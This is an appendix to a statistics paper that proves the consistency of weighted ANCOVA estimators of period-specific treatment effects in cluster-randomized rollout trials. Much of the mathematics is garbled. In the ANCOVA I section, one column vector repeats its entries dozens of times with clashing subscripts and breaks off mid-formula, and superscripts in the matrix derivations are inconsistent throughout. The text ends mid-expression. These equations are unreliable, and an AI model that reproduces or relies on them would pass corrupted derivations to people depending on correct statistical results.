\[=\left(\begin{array}{cc}w_{j}^{1}&w_{j}^{1}\overline{\mathbf{X}}_{ j}^{1}\\ w_{j}^{1}\overline{\mathbf{X}}_{j}^{1}&\sum_{i=1}^{I}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk} \widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}\end{array}\right).\] \[\sum_{i=1}^{I}\mathbf{D}_{ij}\mathbf{W}_{ij}\mathbf{Y}_{ij}=\sum_{i=1}^{I}\left(\begin{array} []{cc}Z_{ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij}\mathbf{Y}_{ij}\\ Z_{ij}\overline{\mathbf{X}}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{Y}_{ij}\end{array}\right)= \left(\begin{array}{c}w_{1}^{1}\overline{y}_{j}(1)\\ \sum_{i=1}^{I}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{X}}_{ijk}^ {\prime}\end{array}\right).\] Following similar arguments, we first obtain estimates for \(\widehat{\tau}_{j}^{\ast}\) as \[\widehat{\widehat{\tau}}_{j}=\overline{y}_{j}(1)-\widetilde{\mathbf{X}}_{j}^{1} \widehat{\mathbf{\eta}}_{j}^{\ast}.\] Similarly, the estimate for \(\widehat{\beta}_{j}\): \[\widehat{\beta}_{j}=\overline{y}_{j}(0)-\widetilde{\mathbf{X}}_{j}^{0}\widehat{ \mathbf{\gamma}}_{j}.\] Then \[\widehat{\tau}_{j}^{w}=\widehat{\tau}_{j}^{\ast}-\widehat{\beta}_{j}=\left( \overline{y}_{j}(1)-\widetilde{\mathbf{X}}_{j}^{1}\widehat{\mathbf{\eta}}_{j}^{\ast} \right)-\left(\overline{y}_{j}(0)-\widetilde{\mathbf{X}}_{j}^{0}\widehat{\mathbf{ \gamma}}_{j}\right)=\overline{u}_{j}(1)-\overline{u}_{j}(0).\] ## Web Appendix A2 Proof of Theorem 1 ### Web Appendix A2.1 Proof of consistency We can prove the consistency of \(\widehat{\tau}^{w}\) from the perspective of ratio estimators following Sections A.2.3 and A.3.2 in the Web Appendix of Schochet et al. (2021). We will elaborate on ANCOVA I, and the other three model-assisted estimators follow with some differences due to differences in the associated design matrices. #### Web Appendix A2.1.1 Ancova I We assume limiting values on the finite population parameters. Adopting the randomization regime under finite population in Middleton and Aronow (2015), we assume a sequence of \(c\) finite populations such that as \(c\rightarrow\infty\), and the finite population increases by replicating the original \(I\) clusters \(c\) times and the rollout occurs independently within each copy with \(I_{j}\) treated clusters in period \(j\), for \(j=1,\ldots,J\). Define the following for a finite population with \(I\) clusters: \[\overline{wY(1)}_{j}=\frac{1}{I}\sum_{i=1}^{I}w_{ij}\overline{Y}_{ij}(1),\ \ \overline{wY(0)}_{j}=\frac{1}{I}\sum_{i=1}^{I}w_{ij}\overline{Y}_{ij}(0),\ \ \overline{w}_{j}=\frac{1}{I}\sum_{i=1}^{I}w_{ij}.\] Given these definitions, we have the treatment effect in period \(j\) under finite population as \[\frac{\overline{wY(1)}_{j}}{\overline{w}_{j}}-\frac{\overline{wY(0)}_{j}}{ \overline{w}_{j}}.\] Further assume limiting values as \(I\rightarrow\infty\): \[\overline{wY(1)}_{j}\xrightarrow{p}\mu_{j}^{*}(1),\ \ \overline{wY(0)}_{j} \xrightarrow{p}\mu_{j}^{*}(0),\ \ \overline{w}_{j}\xrightarrow{p}\omega_{j}>0.\] Then the limiting value for the treatment effect in period \(j\) (\(I\rightarrow\infty\)) is \[\frac{\mu_{j}^{*}(1)}{\omega_{j}}-\frac{\mu_{j}^{*}(0)}{\omega_{j}}.\] Our goal is to show that \[\widehat{\tau}_{j}^{w}\xrightarrow{p}\frac{\mu_{j}^{*}(1)}{\omega_{j}}-\frac {\mu_{j}^{*}(0)}{\omega_{j}},\] then the consistency of \(\widehat{\tau}^{w}\) will follow. Assume \[\mathbf{S}_{\mathbf{X},j}=\frac{1}{I}\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ijk}\overline {\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}\xrightarrow{p}\mathbf{\Sigma}_{ \mathbf{X},j},\] and \[\mathbf{S}_{\mathbf{X},Y,j}(z)=\frac{1}{I}\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ijk} \widetilde{\mathbf{X}}_{ijk}^{\prime}Y_{ijk}(z)\xrightarrow{p}\mathbf{\Sigma}_{\mathbf{X },Y,j}(z).\] Also, assume that we have finite limiting values on the variances for the potential outcomes, and as \(I\rightarrow\infty\), \[\frac{1}{I}\sum_{i=1}^{I}w_{ij}\overline{\mathbf{X}}_{ij}\xrightarrow{p}\overline {\mathbf{X}}_{j}^{*},\ \ \frac{1}{I}\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ijk}\mathbf{X}_{ijk}^{\prime}\mathbf{X}_{ ijk}\xrightarrow{p}\overline{\mathbf{X}^{\prime}\mathbf{X}}_{j}^{*},\] and \[\frac{1}{I}\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{ \prime}Y_{ijk}(z)\xrightarrow{p}\overline{\mathbf{X}\mu_{j}^{*}}(z).\] The estimator is \[\left(\begin{array}{c}\widehat{\mathbf{\tau}}\\ \widehat{\mathbf{\beta}}\end{array}\right)\] \[=\left(\begin{array}{cccc|cccc|cccc}\frac{w_{y}^{0}w_{1}^{1}}{w_{ 1}}&&&&0&&&&\frac{w_{y}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}- \overline{\mathbf{X}}_{1}^{0}\right)\\ &\ddots&&&\ddots&&\vdots\\ &&&\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}&&&0&\frac{w_{y}^{0}w_{J}^{1}}{w_{J}}\left( \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)\\ \hline 0&&&&w_{1}&&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&\ddots&&\vdots\\ &0&&&w_{J}&\mathbf{0}_{p}^{\prime}\\ \hline\frac{w_{y}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}- \overline{\mathbf{X}}_{1}^{0}\right)^{\prime}&\cdots&\frac{w_{y}^{0}w_{J}^{1}}{w_{ J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)^{\prime}&\mathbf{0}_{p} &\cdots&\mathbf{0}_{p}&\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk} \widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}\\ &\times\left(\begin{array}{c}\frac{w_{y}^{0}w_{1}^{1}}{w_{1}}\left( \overline{y}_{1}(1)-\overline{y}_{1}(0)\right)\\ \vdots\\ \frac{w_{y}^{0}w_{J}^{1}}{w_{J}}\left(\overline{y}_{J}(1)-\overline{y}_{J}(0) \right)\\ w_{1}\overline{Y}_{1}\\ \vdots\\ w_{J}\overline{Y}_{J}\\ \sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{X }}_{ijk}^{\prime}\end{array}\right)\] \[=\left(\begin{array}{cccc|cccc|cccc}\frac{1}{I}\frac{w_{y}^{0}w_ {1}^{1}}{w_{1}}&&&0&&&\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{1}}\left( \overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\right)\\ &\ddots&&\ddots&&\vdots\\ &&\frac{1}{I}\frac{w_{y}^{0}w_{J}^{1}}{w_{J}}&&&0&\frac{1}{I}\frac{w_{y}^{0}w_ {J}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right) \\ \hline 0&&&&\frac{1}{I}w_{1}&&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&\ddots&&\vdots\\ &0&&&\frac{1}{I}w_{J}&\mathbf{0}_{p}^{\prime}\\ \hline\frac{1}{IJ}\frac{w_{y}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^ {1}-\overline{\mathbf{X}}_{1}^{0}\right)^{\prime}&\cdots&\frac{1}{IJ}\frac{w_{y}^ {0}w_{1}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0} \right)^{\prime}&\mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\frac{1}{IJ}\sum_{i=1}^{I}\sum_{ j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}\overline{\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ ijk}\end{array}\right)^{-1}\] \[\times\left(\begin{array}{cccc|cccc|cccc}\frac{1}{I}\frac{w_{y}^ {0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{1}(1)-\overline{y}_{1}(0)\right)&&\\ \vdots&&&\\ \frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{J}(1)-\overline {y}_{J}(0)\right)&&\\ &\frac{1}{I}w_{1}\overline{Y}_{1}&&\\ &\vdots&&&\\ &\frac{1}{I}w_{J}\overline{Y}_{J}&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{1}(1)- \overline{y}_{1}(0)\right)&&\\ &\vdots&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{J}(1)- \overline{y}_{J}(0)\right)&&\\ &\frac{1}{I}w_{1}\overline{Y}_{1}&&\\ &\vdots&&&\\ &\frac{1}{I}w_{J}\overline{Y}_{J}&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{1}(1)- \overline{y}_{1}(0)\right)&&\\ &\vdots&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{J}(1)- \overline{y}_{J}(0)\right)&&\\ &\frac{1}{I}w_{1}\overline{Y}_{1}&&\\ &\vdots&&&\\ &\frac{1}{I}w_{J}\overline{Y}_{J}&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{1}(1)- \overline{y}_{1}(0)\right)&&\\ &\vdots&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{J}(1)- \overline{y}_{J}(0)\right)&&\\ &\frac{1}{I}w_{1}\overline{Y}_{1}&&\\ &\vdots&&&\\ &\frac{1}{I}w_{J}\overline{Y}_{J}&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{1}(1)- \overline{y}_{1}(0)\right)&&\\ &\vdots&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{1}(1)- \overline{y}_{1}(0)\right)&&\\ &\vdots&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{1}(1)- \overline{y}_{J}(0)\right)&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{J}(1)- \overline{y}_{J}(0)\right)&&\\ &\frac{1}{I}w_{1}\overline{Y}_{1}&&\\ &\vdots&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{J}(1)- \overline{y}_{J}(0)\right)&&\\ &\vdots&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{1}(1)- \overline{y}_{1}(0)\right)&&\\ &\vdots&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{1}(1)- \overline{y}_{J}(0)\right)&&\\ &\vdots&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{1}(1)- \overline{y}_{J}(0)\right)&&\\ &\vdots&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{1}(1)- \overline{y}_{J}(0)\right)&&\\ &\vdots&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{1}(1)- \overline{y}_{J}(0)\right)&&\\ &\vdots&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{1}(1)- \overline{y}_{J}(0)\right)&&\\ &\vdots&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{J}(1)- \overline{y}_{J}(0)\right)&&\\ &\vdots&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{1}(1)- \overline{y}_{J}(0)\right)&&\\ &\vdots&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{1}(1)- \overline{y}_{J}(0)\right)&&\\ &\vdots&&&\\ &\frac{1}{I}\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{1}(1)- \overline{y}_{1} Also, \[\frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X }}^{\prime}_{ijk}\widetilde{\mathbf{X}}_{ijk}=\frac{1}{J}\sum_{j=1}^{J}\frac{1}{I} \sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}^{\prime}_{ijk} \widetilde{\mathbf{X}}_{ijk}\stackrel{{ p}}{{\rightarrow}}\frac{1}{J} \sum_{j=1}^{J}\mathbf{\Sigma}_{\mathbf{X},j}=\mathbf{\Sigma}_{\mathbf{X}}.\] Then, \[\left(\begin{array}{cccc|cccc}\frac{1}{I}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}&&&& &0&&&\frac{1}{I}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1 }-\overline{\mathbf{X}}_{1}^{0}\right)\\ &\ddots&&&\ddots&&\vdots\\ &&&\frac{1}{I}\frac{w_{1}^{0}w_{2}^{1}}{w_{J}}&&&0&\frac{1}{I}\frac{w_{2}^{0}w _{2}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0} \right)\\ \hline 0&&&&\frac{1}{I}w_{1}&&&\mathbf{0}_{p}^{\prime}\\ &&\ddots&&&\ddots&&\vdots\\ &&0&&&\frac{1}{I}w_{J}&\mathbf{0}_{p}^{\prime}\\ \hline\frac{1}{IJ}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^ {1}-\overline{\mathbf{X}}_{1}^{0}\right)^{\prime}&\cdots&\frac{1}{IJ}\frac{w_{2}^{0 }w_{1}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0} \right)^{\prime}&\mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\frac{1}{IJ}\sum_{i=1}^{I}\sum_{ j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}^{\prime}_{ijk}\widetilde{\mathbf{X}}_{ ijk}\end{array}\right)\] \[\stackrel{{ p}}{{\rightarrow}}\left(\begin{array}{cccc |cccc}e_{1}(1-e_{1})\omega_{1}&&&0&&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&&\ddots&&\vdots\\ &e_{J}(1-e_{J})\omega_{J}&&&0&\mathbf{0}_{p}^{\prime}\\ &0&&&\omega_{1}&&\mathbf{0}_{p}^{\prime}\\ &&\ddots&&0&&\omega_{J}&\mathbf{0}_{p}^{\prime}\\ &\mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\mathbf{0}_{p}&\mathbf{\Sigma}_{\mathbf{X}}\end{array}\right).\] By continuity of the inverse and Slutsky's theorem, \[\left(\begin{array}{cccc|cccc}\frac{1}{I}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}&&&& &0&&&\frac{1}{I}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1 }-\overline{\mathbf{X}}_{1}^{0}\right)\\ &\ddots&&&\ddots&&&\vdots\\ &&&\frac{1}{I}\frac{w_{1}^{0}w_{2}^{1}}{w_{J}}&&&0&\frac{1}{I}\frac{w_{2}^{0}w_{ 2}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right) \\ \hline 0&&&&\frac{1}{I}w_{1}&&&\mathbf{0}_{p}^{\prime}\\ &&\ddots&&&\ddots&&\vdots\\ &0&&&\frac{1}{I}w_{J}&\mathbf{0}_{p}^{\prime}\\ \hline\frac{1}{IJ}\frac{w_{0}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^ {1}-\overline{\mathbf{X}}_{1}^{0}\right)^{\prime}&\cdots&\frac{1}{IJ}\frac{w_{2}^{0 }w_{2}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0} \right)^{\prime}&\mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\frac{1}{IJ}\sum_{i=1}^{I}\sum_{ j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}^{\prime}_{ijk}\widetilde{\mathbf{X}}_{ ijk}\end{array}\right)^{-1}\] \[\stackrel{{ p}}{{\rightarrow}}\left(\begin{array}{cccc |cccc}\frac{1}{e_{1}(1-e_{1})\omega_{1}}&&0&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&\ddots&&\vdots\\ &&\frac{1}{e_{J}(1-e_{J})\omega_{J}}&&\frac{1}{\omega_{1}}&&\mathbf{0}_{p}^{ \prime}\\ &\ddots&&&\ddots&&\vdots\\ &0&&&\frac{1}{\omega_{J}}&\mathbf{0}_{p}^{\prime}\\ &\mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\mathbf{0}_{p}&\mathbf{\Sigma}_{\mathbf{X}}^{\prime}\end{array} \right).\] Also, \[\frac{1}{I}\frac{w_{2}^{0}w_{j}^{1}}{w_{j}}\left(\overline{y}_{j}(1)-\overline {y}_{j}(0)\right)\stackrel{{ p}}{{\rightarrow}}e_{j}(1-e_{j}) \omega_{j}\left(\frac{\mu_{j}^{*}(1)}{\omega_{j}}-\frac{\mu_{j}^{*}(0)}{\omega_{ j}}\right)=e_{j}(1-e_{j})\left(\mu_{j}^{*}(1)-\mu_{j}^{*}(0)\right),\] and \[\frac{1}{I}w_{j}\overline{Y}_{j}=\frac{1}{I}\sum_{i=1}^{I}w_{ij} \overline{Y}_{ij} =e_{j}\frac{1}{I_{j}}\sum_{i=1}^{I}w_{ij}Z_{ij}\overline{Y}_{ij}(1)+(1-e_{j}) \frac{1}{I-I_{j}}\sum_{i=1}^{I}w_{ij}(1-Z_{ij})\overline{Y}_{ij}(0)\] \[\stackrel{{ p}}{{\rightarrow}}e_{j}\mu_{j}^{*}(1)+(1-e_{j}) \mu_{j}^{*}(0).\] By Theorem B of Scott and Wu (1981), \[\frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}\] \[= \frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}Z_{ij} w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}Y_{ijk}(1)+\frac{1}{IJ}\sum_{i=1}^{I} \sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}(1-Z_{ij})w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{ \prime}Y_{ijk}(0)\] \[\xrightarrow{p}\frac{1}{J}\sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_{\mathbf{X },Y,j}(1)+\frac{1}{J}\sum_{j=1}^{J}(1-e_{j})\mathbf{\Sigma}_{\mathbf{X},Y,j}(0).\] Therefore, \[\left(\begin{array}{c}\frac{1}{I}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left( \overline{y}_{1}(1)-\overline{y}_{1}(0)\right)\\ \vdots\\ \frac{1}{I}\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline{y}_{J}(1)-\overline {y}_{J}(0)\right)\\ \frac{1}{I}w_{1}\overline{Y}_{1}\\ \vdots\\ \frac{1}{I}w_{J}\overline{Y}_{J}\\ \frac{1}{I}\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk} \widetilde{\mathbf{X}}_{ijk}^{\prime}\end{array}\right)\xrightarrow{p}\left( \begin{array}{c}e_{1}(1-e_{1})\left(\mu_{1}^{*}(1)-\mu_{1}^{*}(0)\right)\\ \vdots\\ e_{J}(1-e_{J})\left(\mu_{J}^{*}(1)-\mu_{J}^{*}(0)\right)\\ e_{1}\mu_{1}^{*}(1)+(1-e_{1})\mu_{1}^{*}(0)\\ \vdots\\ e_{J}\mu_{J}^{*}(1)+(1-e_{J})\mu_{J}^{*}(0)\\ \frac{1}{J}\sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_{\mathbf{X},Y,j}(1)+\frac{1}{J}\sum_{j= 1}^{J}(1-e_{j})\mathbf{\Sigma}_{\mathbf{X},Y,j}(0)\end{array}\right).\] This leads to \[\left(\begin{array}{c}\widehat{\mathbf{\sigma}}\\ \widehat{\mathbf{\beta}}\\ \widehat{\mathbf{\gamma}}\end{array}\right)\] \[\xrightarrow{p}\left(\begin{array}{ccccc}\frac{1}{e_{1}(1-e_{1 })\omega_{1}}&&0&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&\ddots&&\vdots\\ &&\frac{1}{e_{J}(1-e_{J})\omega_{J}}&&0&\mathbf{0}_{p}^{\prime}\\ 0&&&\frac{1}{\omega_{1}}&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&\ddots&&\vdots\\ &&0&&\frac{1}{\omega_{J}}&\mathbf{0}_{p}^{\prime}\\ \mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\mathbf{\Sigma}_{\mathbf{X} }^{-1}\end{array}\right)\left(\begin{array}{c}e_{1}(1-e_{1})\left(\mu_{1}^{*} (1)-\mu_{1}^{*}(0)\right)\\ \vdots\\ e_{J}(1-e_{J})\left(\mu_{J}^{*}(1)-\mu_{J}^{*}(0)\right)\\ e_{1}\mu_{1}^{*}(1)+(1-e_{1})\mu_{1}^{*}(0)\\ \vdots\\ \frac{1}{J}\sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_{\mathbf{X},Y,j}(1)+\frac{1}{J}\sum_{j= 1}^{J}(1-e_{j})\mathbf{\Sigma}_{\mathbf{X},Y,j}(0)\end{array}\right)\] \[=\left(\begin{array}{c}\frac{1}{\omega_{1}}\left(\mu_{1}^{*}(1 )-\mu_{1}^{*}(0)\right)\\ \vdots\\ \frac{1}{\omega_{j}}\left(\mu_{J}^{*}(1)-\mu_{J}^{*}(0)\right)\\ \frac{1}{\omega_{1}}\left(e_{1}\mu_{1}^{*}(1)+(1-e_{1})\mu_{1}^{*}(0)\right) \\ \vdots\\ \frac{1}{\omega_{J}}\left(e_{J}\mu_{J}^{*}(1)+(1-e_{J})\mu_{J}^{*}(0)\right) \end{array}\right),\] where \[\mathbf{\gamma}^{*}=\left(\sum_{j=1}^{J}\mathbf{\Sigma}_{\mathbf{X},j}\right)^{-1}\left( \sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_{\mathbf{X},Y,j}(1)+\sum_{j=1}^{J}(1-e_{j})\mathbf{ \Sigma}_{\mathbf{X},Y,j}(0)\right).\] Thus, \[\widehat{\tau}_{j}^{w}\xrightarrow{p}\frac{\mu_{j}^{*}(1)}{\omega_{j}}-\frac{ \mu_{j}^{*}(0)}{\omega_{j}}.\] #### Web Appendix A2.1.2 Ancova Ii For ANCOVA II, following similar arguments, we have \[\left(\begin{array}{c}\widehat{\tau}_{j}\\ \widehat{\beta}_{j}\\ \widehat{\mathbf{\gamma}}_{j}\end{array}\right)\] \[=\left(\begin{array}{cccc}\frac{1}{I}\frac{w_{j}^{0}w_{j}^{1}}{w_ {j}}&0&\frac{1}{I}\frac{w_{j}^{0}w_{j}^{1}}{w_{j}}\left(\overline{\mathbf{X}}_{j}^ {1}-\overline{\mathbf{X}}_{j}^{0}\right)\\ 0&\frac{1}{I}w_{j}&\mathbf{0}_{p}^{0}\\ \frac{1}{I}\frac{w_{j}^{0}w_{j}^{1}}{w_{j}}\left(\overline{\mathbf{X}}_{j}^{1}- \overline{\mathbf{X}}_{j}^{0}\right)^{\prime}&\mathbf{0}_{p}&\frac{1}{I}\sum_{i=1}^{I} \sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}\overline{\mathbf{X}}_{ ijk}\end{array}\right)^{-1}\left(\begin{array}{c}\frac{1}{I}\frac{w_{j}^{0}w_{j}^{1}}{w_{1}} \left(\overline{\mathbf{y}}_{j}(1)-\overline{y}_{j}(0)\right)\\ \frac{1}{I}\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{ \prime}\overline{\mathbf{X}}_{ijk}^{\prime}\end{array}\right)\] \[\xrightarrow{p}\left(\begin{array}{ccc}\frac{1}{e_{j}(1-e_{j}) \omega_{j}}&0&\mathbf{0}_{p}^{\prime}\\ 0&\frac{1}{\omega_{j}}&\mathbf{0}_{p}^{\prime}\\ \mathbf{0}_{p}&\mathbf{0}_{p}&\mathbf{\Sigma}_{\mathbf{X},j}^{-1}\end{array}\right)\left( \begin{array}{c}e_{j}(1-e_{j})\left(\mu_{j}^{*}(1)-\mu_{j}^{*}(0)\right)\\ e_{j}\mathbf{\Sigma}_{\mathbf{X},j}(1)+(1-e_{j})\mathbf{\Sigma}_{\mathbf{X},j}(0)\end{array}\right)\] \[=\left(\begin{array}{c}\frac{1}{\omega_{j}}\left(\mu_{j}^{*}(1 )-\mu_{j}^{*}(0)\right)\\ \frac{1}{\omega_{j}}\left(e_{j}\mu_{j}^{*}(1)+(1-e_{j})\mu_{j}^{*}(0)\right) \\ \mathbf{\gamma}_{j}^{*}\end{array}\right),\] where \[\mathbf{\gamma}_{j}^{*}=\mathbf{\Sigma}_{\mathbf{X},j}^{-1}\left(e_{j}\mathbf{\Sigma}_{\mathbf{X },Y,j}(1)+(1-e_{j})\mathbf{\Sigma}_{\mathbf{X},Y,j}(0)\right).\] Thus, \[\widehat{\tau}_{j}^{w}\xrightarrow{p}\frac{\mu_{j}^{*}(1)}{\omega_{j}}-\frac {\mu_{j}^{*}(0)}{\omega_{j}}.\] #### Web Appendix A2.1.3 Ancova Iii For the fully-interacted model without period-specific covariate effects, we have \[\left(\begin{array}{c}\widehat{\mathbf{\tau}}^{*}\\ \widehat{\mathbf{\eta}}^{*}\end{array}\right)\] \[=\left(\begin{array}{cccc|cccc}w_{1}^{1}&&&&&&&\frac{w_{1}^{0}w_{1 }^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\right) \\ &&\ddots&&\vdots\\ &&&w_{J}^{1}&\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}- \overline{\mathbf{X}}_{J}^{0}\right)\\ \hline\frac{w_{J}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}- \overline{\mathbf{X}}_{1}^{0}\right)^{\prime}&\cdots&\frac{w_{J}^{0}w_{J}^{1}}{w_{J }}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)^{\prime} \end{array}\right)\sum_{i=1}^{I}\sum_{j=1}^{J}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk} \widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}\right)\] \[\times\left(\begin{array}{c}w_{1}^{1}\overline{y}_{1}(1)\\ \vdots\\ w_{J}^{1}\overline{y}_{J}(1)\\ \sum_{i=1}^{I}\sum_{j=1}^{J}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde {\mathbf{X}}_{ijk}^{\prime}\end{array}\right)\] \[=\left(\begin{array}{cccc|cccc}\frac{1}{I}w_{1}^{1}&&&&&&&\frac{1 }{I}\frac{w_{J}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}- \overline{\mathbf{X}}_{1}^{0}\right)\\ \ddots&&&&&\vdots\\ \frac{1}{I}w_{J}^{1}&&\frac{1}{I}\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline {\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)\\ \hline\frac{1}{IJ}\frac{w_{J}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}- 